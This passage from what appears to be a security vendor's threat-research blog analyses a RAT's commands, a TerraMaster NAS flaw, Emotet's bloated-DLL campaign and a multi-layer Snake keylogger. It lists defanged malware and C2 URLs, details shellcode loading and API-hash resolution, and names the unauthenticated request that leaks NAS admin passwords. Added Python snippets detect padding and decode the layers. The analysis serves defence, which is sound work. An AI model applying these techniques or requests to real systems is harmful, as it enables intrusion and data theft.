    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • WDExclusion
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • KillProxy
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • gettxt
    • The malware sends the clipboard text to the C2 server.
  • klget
    • The malware sends the stolen keystrokes file which is created by the Lime keylogger.
  • backproxy
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • WebBrowserPass
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.


The archive file was not available on any of the popular threat intelligence sharing portals, such as VirusTotal and ReversingLabs, at the time of writing this blog, which indicates its uniqueness and limited distribution:

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

TerraMaster Remote Command Execution Vulnerability

TerraMaster Technology is a Chinese company that specializes in computer software, network attached storage (NAS), and direct attached storage (DAS). TerraMaster’s products are sold in more than 40 countries. Its main products are personal/home cloud storage, small/medium business network storage, enterprise network storage servers, home/SOHO RAID storage, and video professional RAID storage.

TerraMaster NAS Remote Command Execution Vulnerability | CVE-2022-24990
TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending “User-Agent: TNAS” to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.
SonicWall Capture Labs Threat Research Team observed attackers targeting this vulnerability in the wild.

The CVSS (Common Vulnerability Scoring System) score is 7.5 with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is none.
  • Impact of this vulnerability on data availability is none.

TerraMaster NAS devices running TOS version 4.2.29 suffer from a vulnerability which allows remote unauthenticated attackers to execute commands as root. Following is an example of a way this could be exploited.

The module webNasIPS is vulnerable because of the way it processes requests when the User-Agent is TNAS. When the ‘webNasIPS’ function of the ‘mobile’ class is initiated by api.php, it skips the authentication check and returns sensitive information. The response contains the password hash, the TOS firmware version, the default gateway, and the interface’s IP and MAC address.
The PHP object instantiation could lead to unauthenticated remote command execution with root privileges.

SonicWall Capture Labs provides protection against this threat via following signature:

  • IPS 15830: TerraMaster NAS Information Disclosure

Threat Graph

Emotet seen distributing bloated files to evade detection

The SonicWall Capture Labs threat research team has once again observed a surge in Emotet. This notorious malware, which heavily targets large organizations, uses tactics and functionality similar to those observed in past variants. Originally a banking Trojan, Emotet has evolved into a dropper class of malware. It has been spreading through malicious Microsoft Office documents sent via email. Initially it used Excel 4.0 macros (XLM); currently VBA macros are used to compromise the victims’ machines. This time it also uses a large file size (approx. 538 MB) to evade scanners. The file size is inflated by padding with extra null bytes, which serve no purpose.

INFECTION VECTOR

The initial infection vector is a phishing email with an Office document attachment. This document file contains obfuscated VBA macros. By default, the document is opened in Protected View with macros disabled. To get around this, Emotet document files contain an image with instructions (Figure 1) asking the user to enable content. Once the user enables the content, the macros are executed in the background.

SHA256: 2d59e4dbfa860a68e014227f6bd9c13945d0d474b2d183c2f07e2c7a4864b24c


Fig 1 : Office document in protected view with macro disabled


Fig 2: obfuscated macro in office document file.


Inside the document file, there are multiple macros which have various obfuscated functions and variable names. After debugging this macro, we were able to de-obfuscate the macros and successfully extract all the URLs which are responsible for downloading the payload.

Fig 3: After de-obfuscating the macros, we can see all the URLs which download the payload.


URLs inside document file:

  • hxxps://baumart[.]lv/wp-admin/S8jHW33QU77gLz/
  • hxxp://beyond[.]psiloveyou[.]co[.]za/dR05Bvq90dvlsVBzn/?135641&c=44
  • hxxps://lisaerp[.]com/ncsA/g7zWosP/?135641&c=44
  • hxxp://3313v[.]com/ki7xh/QpSQfw9CPTFtNs4/?135641&c=44
  • hxxp://www[.]dnautik[.]com/wp-includes/UmAJjAP/
  • hxxp://melkovsky[.]com/advice/ZRSaP7QA5yTv1fZs/

These URLs download an archive file which contains a DLL file.

SHA256: 8a674295c02e40a8bb1518752bfe3e4533eb81b5abb2efbd399dd1681d7b82ad


Fig 4: DLL after Extracting Archive.


Fig 5: Appended Null bytes.

This file is an Emotet DLL bloated by appending null bytes to the overlay: the actual PE is only a few hundred KB, but because null data is appended at the end of the file, the file size grows to a few hundred MB. (Here the actual size is 667 KB and the bloated file size is 538 MB.)
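As an added triage example (not Emotet's code and not SonicWall's), the following Python computes the size a PE file should have from its section table (and from its Authenticode certificate table, which legitimately lives in the overlay of signed files), measures the overlay beyond that point, and flags files whose overlay is large and almost entirely NUL bytes, the bloating described above. The minimal PE32+ sample built in the block and the triage thresholds are this example's own assumptions.

```python
import struct


def pe_true_size(pe):
    """End offset of the data the PE headers account for: the section table, every
    section's raw data and, for signed files, the certificate table (data directory 4).
    Anything beyond this offset is overlay the headers do not describe."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    section_table = opt + opt_size
    end = section_table + num_sections * 40  # each IMAGE_SECTION_HEADER is 40 bytes
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", pe, section_table + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    magic = struct.unpack_from("<H", pe, opt)[0]
    cert_dir = opt + (112 if magic == 0x20B else 96) + 4 * 8   # IMAGE_DIRECTORY_ENTRY_SECURITY
    cert_off, cert_size = struct.unpack_from("<II", pe, cert_dir)
    if cert_size:
        end = max(end, cert_off + cert_size)
    return end


def overlay_report(pe):
    true_size = pe_true_size(pe)
    overlay = pe[true_size:]
    return {
        "true_size": true_size,
        "file_size": len(pe),
        "overlay_size": len(overlay),
        "null_ratio": overlay.count(0) / len(overlay) if overlay else 0.0,
    }


def is_null_bloated(pe, min_overlay=1_000_000, min_null_ratio=0.99):
    """Triage rule (thresholds assumed for this example): a large overlay that is almost
    entirely NUL bytes is padding to defeat size limits, not data the file needs."""
    r = overlay_report(pe)
    return r["overlay_size"] >= min_overlay and r["null_ratio"] >= min_null_ratio


def build_sample_pe(section_data, padding=b""):
    """Constructed minimal PE32+ with a single .text section; not a runnable binary."""
    e_lfanew, opt_size = 0x40, 240
    raw_ptr = e_lfanew + 24 + opt_size + 40          # section data right after the section table
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, opt_size, 0x2022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+ magic
    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                          len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section + section_data + padding


CLEAN_SAMPLE = build_sample_pe(b"\xcc" * 100)
BLOATED_SAMPLE = build_sample_pe(b"\xcc" * 100, padding=b"\x00" * 5000)

if __name__ == "__main__":
    for name, pe in (("clean", CLEAN_SAMPLE), ("bloated", BLOATED_SAMPLE)):
        print(name, overlay_report(pe), is_null_bloated(pe, min_overlay=4096))
```

Scanning engines that skip files above a size limit never see the 667 KB of real code inside a 538 MB file; a rule like this one, applied before the size check, lets a scanner strip the padding and look at the true image instead.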


DLL Analysis:

Encrypted shellcode and an encrypted PE file are embedded within the resource section of the binary. The encrypted PE file is 0x2B000 bytes in size.

Fig 6 : embedded encrypted PE file and shell code blob in resource.


It uses the LdrFindResource_U API to find the encoded resource data and LdrAccessResource to fetch its contents. It calls NtAllocateVirtualMemory to allocate memory in which to decrypt the shellcode and payload. The malware uses a hardcoded 0x3B-byte decryption key and a custom decryption loop to decrypt the payload PE file and shellcode.


Fig 7 : Decryption Key


Fig 8 : Decryption Loop to decrypt actual payload embedded in resource section


Once it completes decryption of the shellcode blob, it transfers execution control to the shellcode using NtQueueApcThread and NtTestAlert. NtQueueApcThread queues an APC to a thread; here the shellcode is queued as an APC to the current thread.

NtTestAlert is a system call related to the alerting mechanism of Windows. It triggers execution of any pending APCs the thread has, so once NtTestAlert is called the shellcode starts executing.

Fig 9 : Transfers execution control to injected shell code


The following is a snapshot from the shellcode blob, where we can see that strings have been pushed onto the stack; these will later be used to resolve API addresses dynamically.

Fig 10 : start of shell code

The task of the shellcode is to map the DLL file into virtual memory the way the loader would align it, and to start the execution of the actual payload DLL.

Fig 11 : Execution of shell code started


The malware resolves APIs by passing a hard-coded checksum of the API on the stack or in a register, then computing the checksum of the combination of the DLL name string and the API name. If the checksums match, it has found the name of the API it wants to use. In Fig 11 we can see 0xBDBF9C13, which is the checksum DWORD used to resolve the API “LdrLoadDll”.

The steps it follows are:

  • Push the hardcoded hash into a register (or onto the stack).
  • Call the API resolver function.
  • Access the PEB structure.
  • Access PEB_LDR_DATA from the PEB; it is at offset 0x18 in the PEB.
  • Access InLoadOrderModuleList from PEB_LDR_DATA; it is at offset 0x10 in PEB_LDR_DATA.
  • Using InLoadOrderModuleList, access the address at which each DLL is loaded in memory and its wide-character name.
  • Check whether an export directory is present in the loaded module; if not, move to the next loaded module in the list.
  • If an export directory is present, calculate the checksum of the DLL name.
  • Traverse the loaded DLL in memory to reach the export directory, read the function names RVA and add this RVA to the base address of the DLL.
  • Go to the last exported function name by multiplying NumberOfNames (the function counter) and adding the function names RVA.
  • One by one, access every API name and calculate the checksum of the API name.
  • Finally, add the API name checksum to the DLL name checksum and compare the result with the previously pushed hard-coded DWORD value; if it matches, the malware has found the API name, otherwise it keeps enumerating the loaded DLLs in memory.
  • Once the API name is found, access the exported function and read its RVA. Adding the RVA to the base address where the DLL is loaded gives the API address; all API addresses are resolved dynamically this way.


After resolving LdrLoadDll, it resolves the LdrGetProcedureAddress API using the hardcoded DWORD checksum 0x5ED941B5.

Fig 12 : API resolver function, which takes a hard-coded DWORD hash and resolves the API address.


Fig 13 : API resolver function, which traverses the export directory of every module


It uses LdrLoadDll and LdrGetProcedureAddress to resolve the following APIs. All of these API names were pushed onto the stack at the start of shellcode execution.

  • VirtualAlloc
  • LoadLibraryA
  • VirtualProtect
  • GetNativeSystemInfo
  • RtlAddFunctionTable
  • FlushInstructionCache

These APIs are used to map the payload DLL into memory so it can start executing.


DLL Mapping Functionality In memory

  • It enumerates the section headers of the payload DLL to calculate the size the image will occupy in memory; basically, it adds the raw size of each section to that section’s virtual address.
  • It allocates memory for mapping the DLL using the VirtualAlloc API, then copies the first 0x400 bytes of the decrypted payload DLL to the newly allocated memory, skipping the DOS header while copying.

Fig 14 : copy of the payload header data without the DOS header and without the string “This program cannot be run in DOS mode”

  • It moves each section of the payload DLL into the newly allocated memory, each section on a new page.
  • It changes the memory protection of each section.

Fig 15 : changing the protection of each section of the mapped DLL in memory

  • Finally, it calls RtlAddFunctionTable to add a dynamic function table to the dynamic function table list and calls the FlushInstructionCache API so the changes take effect.
  • It parses the loaded DLL to find its entry point and starts execution of the DLL from the address of the entry point.

After returning from the entry point of the payload DLL, execution continues in the “DllRegisterServer” function of the main DLL (not the mapped payload DLL; the injected payload exports a “DllRegisterServer” function as well). The objective of this function is to check whether the exported function of the injected payload is “DllRegisterServer”: it calculates the checksum of the string “DllRegisterServer” and compares it with a hard-coded DWORD checksum; if it matches, execution continues, otherwise the malware exits. It then transfers execution to “DllRegisterServer” in the payload DLL.

Fig 16 : check that the exported function of the injected payload DLL is “DllRegisterServer”


Payload DLL file

It decodes the names of all DLLs which need to be loaded. The following DLLs are loaded by the payload:

  • bcrypt.dll
  • crypt32.dll
  • shell32.dll
  • shlwapi.dll
  • urlmon.dll
  • userenv.dll
  • winhttp.dll
  • wtsapi32.dll

It loads all DLLs from the above list.

API Resolve Functionality in Payload DLL

It resolves Windows API addresses from hardcoded DWORD checksums, using almost the same functionality as was used while resolving LdrFindResource_U and LdrAccessResource in the main DLL. The difference here is that for every API it passes two hardcoded checksums, one for the DLL name and another for the API name, whereas previously it passed a single DWORD checksum (a combination of the DLL name and API name).

It accesses the PEB structure, gets InLoadOrderModuleList by traversing the PEB and then accesses the name of each DLL; it calculates the checksum for every DLL and matches it against the passed DWORD checksum. For example, it compares against the hard-coded hash 0xAA83E8EA to find the loaded base address of kernel32.dll. Once it has resolved the base address of the DLL, it enumerates the export directory of the loaded DLL, calculates the checksum of each API name and compares it with the hard-coded DWORD checksum. If the API name is found, it takes the RVA from the export directory and adds it to the base address of the loaded DLL. The functions which calculate the checksums for the DLL name and API name here are quite complex compared to the function found in the main DLL.

Fig 17 : Function which resolve API address


Fig 18 : Calculate checksum for API name


Fig 19 : Decryption loop to get encoded DLL names

The following are some API names and their respective DWORD checksums used in the payload.

  • 6AE056F0h : memset
  • 609FD004h : CreateEventW
  • 87CA8415h : CreateTimerQueue
  • 9BD9AB80h : CreateTimerQueueTimer
  • 160FBC8Dh : WaitForMultipleObjects
  • 0E9E794B7h : BCryptOpenAlgorithmProvider
  • 11B5B47Ah : BCryptGenRandom
  • 35BF9169h : BCryptCloseAlgorithmProvider
  • 69230A13h : GetModuleFileNameW
  • 1D50CF79h : OpenSCManagerW
  • 32655658h : CloseServiceHandle
  • 0ABE413E5h : CreateToolhelp32Snapshot
  • 0C60B628h : Process32FirstW
  • 91BB593Ah : GetCurrentProcessId
  • 0A2188CCBh : Process32NextW
  • 6B466D98h : GetProcessHeap
  • D84B3D0A : GetModuleHandleA
  • 8B1AD334h : HeapAlloc
  • 3434C63Dh : CloseHandle
  • 25A83B18h : OpenProcess
  • 0B2D79594h : QueryFullProcessImageNameW
  • 5D2B782Fh : PathFindFileNameW
  • 0FC917Eh : SHGetFolderPathW
  • 305B4B5Ah : lstrlenA
  • 0C019E25Ah : StrCmpNIW
  • 0AE929DCDh : lstrcpyW
  • 32C0D23Ch : SHFileOperationW
  • 0AE9B6EABh : _snwprintf
  • 6A53AC4Dh : DeleteFileW
  • 0A9867BD9h : CreateProcessW
  • 73BF5525h : kernel32_SetEvent
  • 0D3711A37h : DeleteTimerQueueEx
  • 9D1964ACh : kernel32_ExitProcess
  • 661CE361h : RtlExitUserProcess


It checks the folder path from which the process is running. If it is not running from the %AppData%\Local directory, it moves the main DLL there, spawns a child regsvr32.exe process with the path of the moved DLL as the command-line argument, and kills the parent, becoming a ‘non-existent process’; this is an anti-analysis technique that prevents debuggers from attaching to the process.

Fig 20 : Regsvr32.exe restarted with dropped DLL as argument.


It sends data over the internet using the WinHTTP API.

Fig 21 : encoded data sent to the C2 server


We have found various C2 URLs with which it performs command-and-control activity.

C2 URLs:

  • hxxps://91[.]121[.]146[.]47:8080/wueylobjdxujn/
  • hxxps://72[.]15[.]201[.]15:8080/wueylobjdxujn/
  • hxxps://187[.]63[.]160[.]88:80/wueylobjdxujn/
  • hxxps://104[.]168[.]155[.]143:8080/
  • hxxps://91[.]207[.]28[.]33:8080/wueylobjdxujn/
  • hxxps://167[.]172[.]199[.]165:8080/wueylobjdxujn/
  • hxxps://164[.]90[.]222[.]65/wueylobjdxujn/


Evidence of the detection by the RTDMI(tm) engine can be seen below in the Capture ATP report for this file:


Snake Keylogger abusing Protocol Buffers seen in the wild

The SonicWall Capture Labs Research team has observed Windows Shortcut (LNK) files being delivered to potential victims as email attachments which download and execute the Snake keylogger. The Snake keylogger’s final payload is wrapped in multiple layers of protection to thwart detection and impede analysis. This variant of Snake keylogger keeps the remote host information in a Protocol Buffer, which is de-serialized using the protobuf-net library.

Protocol Buffers is a free and open-source cross-platform data format used to serialize structured data. It is useful in developing programs to communicate with each other over a network or for storing data.

The Snake keylogger keeps its initial configuration JSON data encrypted in a PE file resource. After decrypting the JSON data, it is de-serialized using the “Newtonsoft JSON” library. We observe that malware authors are increasingly using genuine libraries to accomplish their tasks rather than writing their own code, which makes the malware code less suspicious.

PowerShell Script

The PowerShell script contains an encrypted URL, which is decrypted by passing it to the function “sDjLksFILdkrdR”. The decryption logic is simple: it first reverses the complete string, then reverses each two-character chunk in turn to get the actual URL. The PowerShell script downloads an HTML Application (HTA) file from the URL “h[t][t]p://179.43.175.187/ksjy/OBOTESKILLZDUMBCHICHI.hta” into “%APPDATA%\OBOTESKILLZDUMBCHICHI.hta”. The malware executes and then deletes the downloaded HTA file:
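The two-step string transform described above, as an added example that is not the script's own code: a decoder that reverses the whole string and then each two-character chunk, plus its inverse (an assumption, since the post only describes decryption) used to build a constructed sample.

```python
"""Added example (not the PowerShell script's own code): the two-step URL
transform the post describes, reverse the whole string and then reverse each
two-character chunk, together with its inverse for building a test vector."""


def swap_pairs(text: str) -> str:
    """Reverse every two-character chunk; a trailing odd character stays put."""
    return "".join(text[i:i + 2][::-1] for i in range(0, len(text), 2))


def decrypt_url(encoded: str) -> str:
    """Undo the obfuscation: full reversal first, then pair-wise reversal."""
    return swap_pairs(encoded[::-1])


def encrypt_url(plain: str) -> str:
    """Inverse of decrypt_url (swap_pairs is its own inverse). Used only to
    construct samples; the post does not describe an encoder."""
    return swap_pairs(plain)[::-1]


# Constructed sample, not the URL from the post.
SAMPLE_PLAIN = "http://example.invalid/sample.hta"
SAMPLE_ENCODED = encrypt_url(SAMPLE_PLAIN)

if __name__ == "__main__":
    print(SAMPLE_ENCODED)
    print(decrypt_url(SAMPLE_ENCODED))
```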

 

HTML Application

The HTA file contains obfuscated VBScript, which downloads and executes a PE file from the URL “h[t][t]p://179.43.175.187/ksjy/fund.exe”:

 

Layer 1

The Snake keylogger contains multiple layers of protection, and most of them involve decrypting the next layer binary from resource data. In this layer, the malware base64-decodes the resource data and reverses the byte array to get the next layer Dynamic Link Library (DLL), “Euxamuuiclre.dll”. The malware loads the next layer DLL and invokes its function “Stxogeqelkfu”:

 

Layer 2

The malware contains a compressed JSON object in its resource, which is decompressed and then de-serialized using the “Newtonsoft JSON” library. The JSON object contains 34 fields, but we are not examining all of them in detail, as we are more interested in getting the next layer binary:

The malware keeps the next layer executable in JSON attribute “33”. It base64-decodes the value, reverses the byte array and decompresses the result to get the next layer executable:
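The unwrapping chain used by Layer 1 (base64, then reverse) and Layer 2 (base64, reverse, then decompress), as an added example that is not the malware's code. The post does not name the compressor, so gzip is assumed here with raw DEFLATE as a fallback; the recovered bytes are checked for a PE header before being treated as the next layer.

```python
"""Added example (not the malware's code): undo the resource wrapping the post
describes for the Snake keylogger layers: base64 -> reverse the byte array ->
decompress. gzip is an assumption (the post does not name the compressor)."""
import base64
import gzip
import zlib


def unwrap_layer(b64_text: str) -> bytes:
    """Base64-decode, reverse, then decompress (gzip, or raw DEFLATE as fallback)."""
    raw = base64.b64decode(b64_text)
    reversed_bytes = raw[::-1]
    try:
        return gzip.decompress(reversed_bytes)
    except (OSError, EOFError):
        return zlib.decompress(reversed_bytes, -15)  # raw DEFLATE, no header


def looks_like_pe(data: bytes) -> bool:
    """'MZ' magic plus the PE signature at the e_lfanew offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def wrap_layer(payload: bytes) -> str:
    """Inverse transform, used only to build a constructed sample resource."""
    return base64.b64encode(gzip.compress(payload)[::-1]).decode("ascii")


# Constructed stand-in for a wrapped layer: a minimal DOS/PE header skeleton,
# not a real binary.
FAKE_PE = bytearray(0x80)
FAKE_PE[:2] = b"MZ"
FAKE_PE[0x3C:0x40] = (0x40).to_bytes(4, "little")
FAKE_PE[0x40:0x44] = b"PE\x00\x00"
SAMPLE_RESOURCE = wrap_layer(bytes(FAKE_PE))
```

For Layer 1, which has no compression step, only the base64 and reverse steps apply.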

Additionally, the malware checks whether it is running inside a debugger or in a controlled environment:

 

Layer 3

The malware decompresses the resource “Kdagpwvqqwblrve”, reverses the bytes to get the next layer DLL and invokes its method “KHwfexS3b”:

 

Snake Keylogger

The malware uses the Protocol Buffers library “protobuf-net.dll” to retrieve the data for the class object “blrZfRKkSGhOEXcqyNO”. The buffer data contains the remote host IP address and port number:
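To show what protobuf-net is decoding here, an added example (not the malware's or protobuf-net's code): a minimal reader for the Protocol Buffers wire format that pulls the host and port out of a serialized message. The field numbers (1 = host string, 2 = port varint) and the sample host are assumptions; the post does not state the schema.

```python
"""Added example (not the malware's or protobuf-net's code): a minimal Protocol
Buffers wire-format reader. Field numbers are assumptions (1 = host string,
2 = port varint); the post does not state them. Wire types 0 (varint),
1 (fixed64), 2 (length-delimited) and 5 (fixed32) are handled."""


def read_varint(buf: bytes, pos: int) -> tuple:
    """Decode a base-128 varint at pos; return (value, new position)."""
    result = shift = 0
    while pos < len(buf):
        byte, pos = buf[pos], pos + 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7
    raise ValueError("truncated varint")


def parse_fields(buf: bytes) -> dict:
    """Walk tag/value pairs; return {field_number: [values]} in wire order."""
    fields = {}
    pos = 0
    while pos < len(buf):
        tag, pos = read_varint(buf, pos)
        field, wire = tag >> 3, tag & 7
        if wire == 0:
            value, pos = read_varint(buf, pos)
        else:
            if wire == 2:
                size, pos = read_varint(buf, pos)
            elif wire in (1, 5):
                size = 8 if wire == 1 else 4
            else:
                raise ValueError(f"unsupported wire type {wire}")
            value, pos = buf[pos:pos + size], pos + size
            if len(value) != size:
                raise ValueError("truncated field")
        fields.setdefault(field, []).append(value)
    return fields


def extract_c2(buf: bytes) -> tuple:
    """Assumed schema: field 1 = host (string), field 2 = port (varint)."""
    fields = parse_fields(buf)
    return fields[1][0].decode("ascii"), fields[2][0]


# Constructed sample: a TEST-NET host with port 7701 as in the post.
# Tags: field 1 wire 2 -> 0x0A; field 2 wire 0 -> 0x10; 7701 as varint -> 95 3C.
HOST = b"203.0.113.10"
SAMPLE_MESSAGE = b"\x0a" + bytes([len(HOST)]) + HOST + b"\x10\x95\x3c"
```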

The malware creates a mutex “5500278311” and tries to connect to the remote host IP “194.55.224.98” at port number “7701”. The malware could not establish a connection to the remote host, as it was down at the time of analysis:

The Snake Keylogger is known for stealing and sending the following information from the victim’s machine:

  • Key logs
  • Screenshots
  • Clipboard data
  • Application data

 

At the time of writing this blog, the file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal, which indicates its spreading potential:

 

Evidence of detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file: